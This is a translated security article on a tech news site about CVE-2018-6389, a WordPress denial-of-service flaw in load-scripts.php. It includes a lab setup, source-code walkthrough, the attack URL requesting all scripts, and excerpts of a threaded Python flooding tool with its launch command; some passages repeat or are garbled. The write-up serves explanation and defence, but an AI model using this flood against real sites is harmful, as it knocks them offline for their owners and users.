By using this site, you agree to the Privacy Policy and Terms of Use.
Accept
10alert.com10alert.com
  • Threats
    • WordPress ThreatsDanger
    Threats
    A cyber or cybersecurity threat is a malicious act that seeks to damage data, steal data, or disrupt digital life in general. Cyber threats include…
    Show More
    Top News
    CryptoLocker is Bad News
    8 months ago
    Debunking the myths of malware and antivirus programs
    8 months ago
    Security Week 38: Cisco routers under attack, bug in AirDrop, CoinVault cryptohawkers aressted
    8 months ago
    Latest News
    Triangulation: Trojan for iOS | Kaspersky official blog
    2 days ago
    Wordfence Intelligence Weekly WordPress Vulnerability Report (May 22, 2023 to May 28, 2023)
    2 days ago
    Safeguards against firmware signed with stolen MSI keys
    4 days ago
    WPDeveloper Addresses Privilege Escalation Vulnerability in ReviewX WordPress Plugin
    4 days ago
  • Fix
    Fix
    Troubleshooting guide you need when errors, bugs or technical glitches might ruin your digital experience.
    Show More
    Top News
    Surface Pro 4 teardown: Get a closer look at the components
    8 months ago
    How to reset Windows Update components on Windows 10
    8 months ago
    Windows 11 build 22610 with new changes in Dev and Beta Channels
    8 months ago
    Latest News
    How automatically delete unused files from my Downloads folder?
    4 months ago
    Now you can speed up any video in your browser
    4 months ago
    How to restore access to a file after EFS or view it on another computer?
    4 months ago
    18 Proven Tips to Speed Up Your WordPress Site and Improve SEO | 2023 Guide
    5 months ago
  • How To
    How ToShow More
    Dynamic data collection with Zaraz Worker Variables
    Dynamic data collection with Zaraz Worker Variables
    1 day ago
    Reduce latency and increase cache hits with Regional Tiered Cache
    Reduce latency and increase cache hits with Regional Tiered Cache
    2 days ago
    Cloudflare is deprecating Railgun
    Cloudflare is deprecating Railgun
    2 days ago
    What is two-factor authentication | Kaspersky official blog
    5 days ago
    Acer refreshes Windows 11 PCs for work and play: Swift Edge 16 and Predator Triton 16
    1 week ago
  • News
    News
    This category of resources includes the latest technology news and updates, covering a wide range of topics and innovations in the tech industry. From new…
    Show More
    Top News
    How to clear and disable activity history on Windows 11
    3 months ago
    How to change new Outlook app theme on Windows 11
    2 months ago
    How to enable Hibernate on Windows 11
    1 month ago
    Latest News
    How to add CPU, GPU, RAM widgets on Windows 11
    2 days ago
    How to create virtual drive (VHD, VHDX, Dev Drive) on Windows 11
    5 days ago
    How to enable Taskbar End Task option to close apps on Windows 11
    5 days ago
    How to check USB4 devices specs from Settings on Windows 11
    5 days ago
  • Glossary
  • My Bookmarks
Reading: Pressing WordPress. How the new method of “putting” sites on WordPress works
Share
Notification Show More
Aa
Aa
10alert.com10alert.com
  • Threats
  • Fix
  • How To
  • News
  • Glossary
  • My Bookmarks
  • Threats
    • WordPress ThreatsDanger
  • Fix
  • How To
  • News
  • Glossary
  • My Bookmarks
Follow US
Wordpress Threats

Pressing WordPress. How the new method of “putting” sites on WordPress works

Tom Grant
Last updated: 10 October
Tom Grant 2 years ago
Share
10 Min Read

Article content

  • Stand
  • Vulnerability details
  • Automate it
  • Vulnerability demonstration (video)
  • Contents
    In WordPress itself, popular CMS in the world, a bug was found that allows you to cause a site denial of service, that is, DoS. Successful operation can easily be carried out remotely, and for this you do not need to have any rights in the system. The flaw was discovered by Israeli researcher Barak Tawily aka Quitten while he was looking into another WordPress project. The vulnerability has been given the identifier CVE-2018-6389 and is present on thousands of sites around the world, since WordPress developers The Foundation has been slow to acknowledge the seriousness of the problem and fix it. As a result, even the most recent CMS versions at the time of writing the article were not spared from the bug – 4.9.5. So, I propose to take a closer look at the vulnerability, and there you will decide for yourself how terrible the devil is. Stand I've already raised the WordPress vulnerability test bench several times to write about another vulnerability, so I'll quickly go over the main aspects without going into too much detail. By tradition, we use the Docker container on Debian and the seventh version of PHP with Apache.Download and extract WordPress version ii 4.9.5: $ cd /tmp && wget https://wordpress.org/wordpress-4.9.5.tar.gz $ tar xzf wordpress-4.9.5.tar.gz $ rm -rf /var/www/html/&& mv wordpress//var/www/html/ $ chown -R www-data:www-data /var/www/ html/ Starting the necessary services: $ service mysql start && service apache2 start $ mysql -u root -e "CREATE DATABASE wpdos; GRANT ALL PRIVILEGES ON *.TO 'root'@'localhost' IDENTIFIED BY 'megapass';" The next step is to install the CMS through browser. WordPress Installation We recommend reading: Xakep #280. Jail-2022 Issue content Hacker Subscription-60% Vulnerability details So, Tavili, while browsing another WordPress site, noticed the script load-scripts.php. It is used to display JavaScript. The names of the files to be loaded are specified in the parameter load, and their contents are merged when output. This was done in order to speed up page loading and reduce the number of requests to the server. Thus, in order for the browser to receive all the JS files necessary for the correct display, it is enough to make a request for one script load-scripts.php, in the parameters of which all required JavaScript files will be listed. By the way, this is a fairly common practice when developing a backend. The script has the same logic load-styles.php, for CSS files only. Let's look at the source code load-scripts.php. File names are separated by commas. /wp-admin/load-scripts.php 17: $load = $_GET['load']; 18: if ( is_array( $load ) ) 19: $load = implode( '', $load ); 20: 21: $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); 22: $load = array_unique( explode( ',', $load ) ); What kind of scripts can we download? Of course, you won't be able to read an arbitrary file, there is a clearly defined list of allowed objects. /wp-admin/load-scripts.php 48: foreach ( $load as $handle ) { 49: if ( !array_key_exists($handle, $wp_scripts->registered) ) 50: continue; 51:52: $path = ABSPATH . $wp_scripts->registered[$handle]->src; 53: $out .= get_file($path) . "n"; 54: } This list is in property registered class WP_Scripts and filled in using the function wp_default_scripts from file script-loader.php. /wp-admin/load-scripts.php 36: $wp_scripts = new WP_Scripts; 37: wp_default_scripts($wp_scripts); /wp-includes/script- loader.php37: /38: Register all WordPress scripts. ... 46: @param WP_Scripts $scripts WP_Scripts object. 47: */ 48: function wp_default_scripts( &$scripts ) { The list of files allowed for uploading is replenished using the method . /wp-includes/script-loader.php 048: function wp_default_scripts( &$scripts ) { ... 086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 ); 087: 088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array, '1.6.1', 1 ); ... 125: $scripts->add( 'editor', "/wp-admin/js/editor$suffix.js", array('utils','jquery'), false, 1 ); ... The call parameters specify the name of the element, the path to the file, dependencies on other elements, the version, and so on. /wp-includes/class.wp-scripts.php 18: class WP_Scripts extends WP_Dependencies { /wp-includes/class.wp-dependencies.php 206: public function add( $handle, $src, $deps = array, $ver = false, $args = null ) { 207: if ( isset($this->registered[$handle]) ) 208: return false; 209: $this->registered[$handle] = new _WP_Dependency( $handle, $src, $deps, $ver, $args ); 210: return true; 211: } A complete list of all calls to loadable items can be found here. There are 181 of them in total. Minified versions of scripts are loaded by default. /wp-includes/script-loader.php 67: $suffix = SCRIPT_DEBUG ? '' : '.min'; 68: $dev_suffix = $develop_src ? '' : '.min'; Call to load script utils.min.js via load-scripts.php The idea is to read all possible JS files in one request. It turns out to be monstrous, I will not quote it in its entirety, but instead of the ellipsis at the end, there should be 170 more file names. The time elapsed from the sending of a request to the first received byte of the response, equals ~500 milliseconds. Approximately so much the server processed this request. Loading all JS files at the same time via a request to load-scripts.php Each file is read separately using file_get_contents . /wp-admin/includes/noop.php102: function get_file( $path ) { 103: 104: if ( function_exists('realpath') ) { 105: $path = realpath( $path ); 106: } 107: 108: if ( ! $path || ! @is_file( $path ) ) { 109: return ''; 110: } 111: 112: return @file_get_contents( $path ); 113: } It turns out that each request will cause 181 I / O operations, and if there are many such requests, then soon server may start having problems. This is especially true for sites on shared hosting. Automate it Now let's organize multiple requests to that URL. For these purposes, Tavili used a self-written utility called doser, which executes requests to the server in the specified number of threads. The script itself is written in Python 2.7 using the requests and threading libraries. The calling procedure is simple: $ python doser.py -g -t 999 Key g tells us that we need to send requests using the GET method, and using t you can specify the number of threads. doser.py 067: def sendGET(url): ... 070: try: 071: request_counter+=1 072: request = requests.get(url, headers=headers) ... 094: while True: 095: global url 096: sendGET(url) ... 113: def main(argv): ... 115: parser.add_argument( '-g', help='Specify GET request.Usage: -g '' ') ... 119: parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int) ... 128: for i in range(args.t) : 129: t = SendGETThread Perhaps the solution is not the fastest and most optimal, but the script works in good faith and copes with the task. After two thousand requests, our simple server is no longer available to the average user. Successfully carried out DoS attack To add a little more load, you can additionally send requests to load CSS files via load-styles.php . Vulnerability demonstration (video) Conclusions

    Conclusions

    In WordPress itself, popular CMS in the world, a bug was found that allows you to cause a site denial of service, that is, DoS. Successful operation can easily be carried out remotely, and for this you do not need to have any rights in the system.

    The flaw was discovered by Israeli researcher Barak Tawily aka Quitten while he was looking into another WordPress project. The vulnerability has been given the identifier CVE-2018-6389 and is present on thousands of sites around the world, since WordPress developers The Foundation has been slow to acknowledge the seriousness of the problem and fix it. As a result, even the most recent CMS versions at the time of writing the article were not spared from the bug – 4.9.5.

    So, I propose to take a closer look at the vulnerability, and there you will decide for yourself how terrible the devil is.

    By tradition, we use the Docker container on Debian and the seventh version of PHP with Apache.

    $ docker run -it --rm -p80:80 --name=wpdos --hostname=wpdos debian /bin/bash $ apt-get update && apt-get install -y mysql-server apache2 php php7.0-mysqli nano wget

    WordPress Installation We recommend reading: Xakep #280. Jail-2022

http://wpdos.visualhack/wp-admin/load-scripts.php?load=utils,common,wp-a11y,sack,quicktags,colorpicker,editor,wp-fullscreen-stub,wp- ajax-response,wp-api-request,wp-pointer... 

Conclusions

Here is such a non-standard attack vector. Of course, the impact of its use is not too serious, otherwise we would have already observed a massive “death”. A properly configured dedicated server should not suffer from such a trick. But on shared hosting there are limits on consumed resources, and if they are exhausted, problems may arise. So, during testing on one of my sites, the hoster spammed my mail with messages about exceeding the allocated limits.

Why doesn't WordPress consider this a problem and take the time to fix it? On the one hand, developers can be understood: they are not responsible for the use of their CMS on weak or incorrectly configured servers (WordPress is actually far from the easiest CMS). But this is not at all what you want to hear from the developers of the system on which your blog runs. The problem will still have to be fixed, and I'm sure there are plenty of harmless ways to do this. She already got CVE after all!

Source : xaker.ru

Translate this article

TAGGED: DoS, PoC, Source code, WordPress
Tom Grant October 10, 2022 October 31, 2021
Share this Article
Facebook Twitter Reddit Telegram Email Copy Link Print

STAY CONECTED

24.8k Followers Like
253.9k Followers Follow
33.7k Subscribers Subscribe
124.8k Members Follow

LAST 10 ALERT

Dynamic data collection with Zaraz Worker Variables
Dynamic data collection with Zaraz Worker Variables
Apps 1 day ago
How to add CPU, GPU, RAM widgets on Windows 11
News 2 days ago
Reduce latency and increase cache hits with Regional Tiered Cache
Reduce latency and increase cache hits with Regional Tiered Cache
Apps 2 days ago
Cloudflare is deprecating Railgun
Cloudflare is deprecating Railgun
Apps 2 days ago
Triangulation: Trojan for iOS | Kaspersky official blog
Threats 2 days ago

Recent Posts

  • Dynamic data collection with Zaraz Worker Variables
  • How to add CPU, GPU, RAM widgets on Windows 11
  • Reduce latency and increase cache hits with Regional Tiered Cache
  • Cloudflare is deprecating Railgun
  • Triangulation: Trojan for iOS | Kaspersky official blog

You Might Also Like

Dynamic data collection with Zaraz Worker Variables
Apps

Dynamic data collection with Zaraz Worker Variables

1 day ago
Reduce latency and increase cache hits with Regional Tiered Cache
Apps

Reduce latency and increase cache hits with Regional Tiered Cache

2 days ago
Wordfence Intelligence Weekly WordPress Vulnerability Report (May 22, 2023 to May 28, 2023)
Wordpress Threats

Wordfence Intelligence Weekly WordPress Vulnerability Report (May 22, 2023 to May 28, 2023)

2 days ago
Threats

Safeguards against firmware signed with stolen MSI keys

4 days ago
Show More

Related stories

How to Use Cloudflare to Secure Your WordPress Site
How To Starting Chrome from the command line
How to fix error 0x80070057 in Chrome?
Windows 10 How To Disable Slide to Shutdown
Windows search not working (FIX)
How to watch movies and TV series for free on Kinopoisk?
Previous Next

10 New Stories

Wordfence Intelligence Weekly WordPress Vulnerability Report (May 22, 2023 to May 28, 2023)
Safeguards against firmware signed with stolen MSI keys
WPDeveloper Addresses Privilege Escalation Vulnerability in ReviewX WordPress Plugin
How to create virtual drive (VHD, VHDX, Dev Drive) on Windows 11
How to enable Taskbar End Task option to close apps on Windows 11
How to check USB4 devices specs from Settings on Windows 11
Previous Next
Hot News
Dynamic data collection with Zaraz Worker Variables
How to add CPU, GPU, RAM widgets on Windows 11
Reduce latency and increase cache hits with Regional Tiered Cache
Cloudflare is deprecating Railgun
Triangulation: Trojan for iOS | Kaspersky official blog
10alert.com10alert.com
Follow US

© 10 Alert Network. All Rights Reserved.

  • Privacy Policy
  • Contact
  • Customize Interests
  • My Bookmarks
  • Glossary
Go to mobile version
adbanner
AdBlock Detected
Our site is an advertising supported site. Please whitelist to support our site.
Okay, I'll Whitelist
Welcome Back!

Sign in to your account

Lost your password?